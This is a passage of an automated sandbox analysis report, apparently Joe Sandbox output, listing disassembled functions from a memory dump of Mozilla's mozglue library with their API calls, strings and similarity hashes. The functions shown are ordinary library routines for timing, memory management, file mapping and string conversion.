?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C69B392,?,?,00000001), ref: 6C6991F4

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

Strings

timeline-fileio, xrefs: 6C6990A4
name, xrefs: 6C698F16
timeline-overview, xrefs: 6C69907A
stack-chart, xrefs: 6C6990B2
data, xrefs: 6C6990E8
marker-table, xrefs: 6C69906C
marker-chart, xrefs: 6C69905E
timeline-ipc, xrefs: 6C699096
timeline-memory, xrefs: 6C699088

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: a46f793aff704f56e277412be1ddd98c51ea3a825d501873c4d8477a647ad1d8
Instruction ID: e91fcf3a85a4a0ae094e2106f39310f51662bf5ea7707ab1be9b0a83cbe8eee1
Opcode Fuzzy Hash: a46f793aff704f56e277412be1ddd98c51ea3a825d501873c4d8477a647ad1d8
Instruction Fuzzy Hash: 55B1A3B0B0120A9BDF04CF95C4917EEBBB5EF85318F204419D506ABF80D771A955CBEA

Function 6C67C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C67C5A3
WideCharToMultiByte.KERNEL32 ref: 6C67C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C67C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C67CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C67CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C67CAA5

Strings

(null), xrefs: 6C67C596
0, xrefs: 6C67D30A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction ID: ec663ae348d2d7e35e63457b47664be838fc7f850928f8c79191e0fbf81cf5c1
Opcode Fuzzy Hash: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction Fuzzy Hash: 2AA1B230608341AFDB20DF29C59475EBBE1AFC9758F048D2DE99AD3641D731E805CB6A

Function 6C653480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C65350E
__Init_thread_footer.LIBCMT ref: 6C653522
__aulldiv.LIBCMT ref: 6C653552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C65357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653592

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C653508
kernel32.dll, xrefs: 6C6534EA

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction ID: 9855ab1f5cf0ff1ab9f91fc4aabf033d94efc2b8b54de8244a30b0250912f382
Opcode Fuzzy Hash: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction Fuzzy Hash: 5631B371B012469BDF00DFBAC888AAA77B5FB86745F204429F50193A64DB70B905CF69

Function 6C654480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C694843,?), ref: 6C6545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C694843,?), ref: 6C65468A
free.MOZGLUE(?,?,?,?,?,?,6C694843,?), ref: 6C6546C9
free.MOZGLUE(?), ref: 6C6546EF
free.MOZGLUE(?), ref: 6C654712
free.MOZGLUE(?), ref: 6C654735
free.MOZGLUE(?), ref: 6C654758
free.MOZGLUE(?), ref: 6C65477B
free.MOZGLUE(?), ref: 6C65479E

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction ID: 5853785377ad7fac109c5e2629cf6a5aa9a57433c8303e5361673e4d80730685
Opcode Fuzzy Hash: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction Fuzzy Hash: E5B1F671A001518FDB188E3CC8D07BD77A1AF42328FA846A9E416DBBC6D7B1D8748B59

Function 6C6BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6BAC52
CreateFileMappingW.KERNEL32 ref: 6C6BAC7D
GetSystemInfo.KERNEL32 ref: 6C6BAC98
MapViewOfFile.KERNEL32 ref: 6C6BACB0
GetSystemInfo.KERNEL32 ref: 6C6BACCD
MapViewOfFile.KERNEL32 ref: 6C6BAD05
UnmapViewOfFile.KERNEL32 ref: 6C6BAD1C
CloseHandle.KERNEL32 ref: 6C6BAD28
UnmapViewOfFile.KERNEL32 ref: 6C6BAD37
CloseHandle.KERNEL32 ref: 6C6BAD43
CloseHandle.KERNEL32 ref: 6C6BAD67

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction ID: 1d55252a4fddc2fce995aea856eb7163ac88f37b0f772768b4ec13c3e935887d
Opcode Fuzzy Hash: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction Fuzzy Hash: A53190B1A043058FDB00AF7EC68826EBBF0FF85345F014A2DE98597215EB70A559CB86

Function 6C669620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C669675
__Init_thread_footer.LIBCMT ref: 6C669697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C669707
__Init_thread_footer.LIBCMT ref: 6C66971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669773

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6697B7
FreeLibrary.KERNEL32 ref: 6C6697D0
FreeLibrary.KERNEL32 ref: 6C6697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C669670
MapViewOfFileNuma2, xrefs: 6C6697B1
NtMapViewOfSection, xrefs: 6C669701
ntdll.dll, xrefs: 6C6696E3

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 35d76fc3de0d189954486bef354baa94a85d1ca9c51e24e14303b3a6d5a3e6f7
Instruction ID: c58beb77730c3bb50b81c3ab3c95484078194ae74635b95675cd758bd60d9ed7
Opcode Fuzzy Hash: 35d76fc3de0d189954486bef354baa94a85d1ca9c51e24e14303b3a6d5a3e6f7
Instruction Fuzzy Hash: 38418F757002069BDF00CFA7E8D4AD67BB4EB4A768F014529ED1597B80D730B805CFAA

Function 6C663E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C663EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C663FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6640A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C6640AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C663CCC), ref: 6C6640C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C664134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C663CCC), ref: 6C664157

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: f247eb4cf49074cd7f41e602e599435642a9b1894c5ac81416b866b1157663d0
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 47A181B1A00215CFDB40CF6AC880769B7B5FF49308F2541A9D909AFB42D771E886CBA5

Function 6C6A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8273), ref: 6C6A9D65
free.MOZGLUE(6C6A8273,?), ref: 6C6A9D7C
free.MOZGLUE(?,?), ref: 6C6A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6A9E0F
free.MOZGLUE(6C6A946B,?,?), ref: 6C6A9E24
free.MOZGLUE(?,?,?), ref: 6C6A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6A9EC8
free.MOZGLUE(6C6A946B,?,?,?), ref: 6C6A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6A9EF5

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction ID: fa545ec4329949322bd680fc9968324518d816ccd6c396595b76251b73b351ee
Opcode Fuzzy Hash: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction Fuzzy Hash: 2F71DF70909B418BC712CF68C48055BF3F4FF99318B508A5DE84A5BB02EB31E8C6CB99

Function 6C6ADDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6ADDCF

Part of subcall function 6C68FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C68FA4B

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE0D
free.MOZGLUE(00000000), ref: 6C6ADE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF32

Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADB86
Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF65
free.MOZGLUE(?), ref: 6C6ADF80

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction ID: 0ac89ea29ca3db6d5035dcbc7cb8b3ff9466a922f856cee50f87de06b4473153
Opcode Fuzzy Hash: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction Fuzzy Hash: 4551A1726016019BD7219BA9C8806EFB3B2BF96308F95051CDD5A53B00DB31BD1BCB9E

Function 6C6B5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DC9
std::_Facet_Register.LIBCPMT ref: 6C6B5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E45

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction ID: d43d3134bb9ef4e9c4d1c2bb39eb2cd6776b1883bcd6658d4225881a6cacb5f0
Opcode Fuzzy Hash: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction Fuzzy Hash: 08417C307002049FDB10DFA6C8D8AAE77F6EF89314F144169E506AB791EB30A915CB69

Function 6C68CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6531A7), ref: 6C68CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C68CFA4, 6C68CFB8
<jemalloc>, xrefs: 6C68CF9F, 6C68CFB3

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction ID: 8d2d31da99423ca1da97be1f51af25de81625c11ea9824aa909d2306d991b280
Opcode Fuzzy Hash: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction Fuzzy Hash: 7131A7307422056BFB10AF668C45BAE7775BF85754F204118F612EB684DB70E501CBBD

Function 6C65ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C65ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C65EDCC
CreateFileW.KERNEL32 ref: 6C65EE08
free.MOZGLUE(00000000), ref: 6C65EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C65EE32

Part of subcall function 6C65EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C65EBB5
Part of subcall function 6C65EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C68D7F3), ref: 6C65EBC3
Part of subcall function 6C65EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C68D7F3), ref: 6C65EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C65EDC1

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction ID: 58349f6a09830bb8ba9f10bcb68811798057119605d22f8757a79b57b5dcc24a
Opcode Fuzzy Hash: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction Fuzzy Hash: F251F171E052048BDF00DF69C8806EEB7F0AF4A318F94852DE8956B740E7346959C7EA

Function 6C6CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA565

Part of subcall function 6C6CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CA4BE
Part of subcall function 6C6CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6CA6B6

Strings

0, xrefs: 6C6CA5FB
z, xrefs: 6C6CA6AE

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction ID: 04f669c28a7bbff4618a294ce90f01ccbc11bc35cfc35bd6eeabef394af0ac6b
Opcode Fuzzy Hash: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction Fuzzy Hash: 75414771A097459FC341CF29C080A8BBBE4FF8A344F408A2EF49987651EB30D549CB87

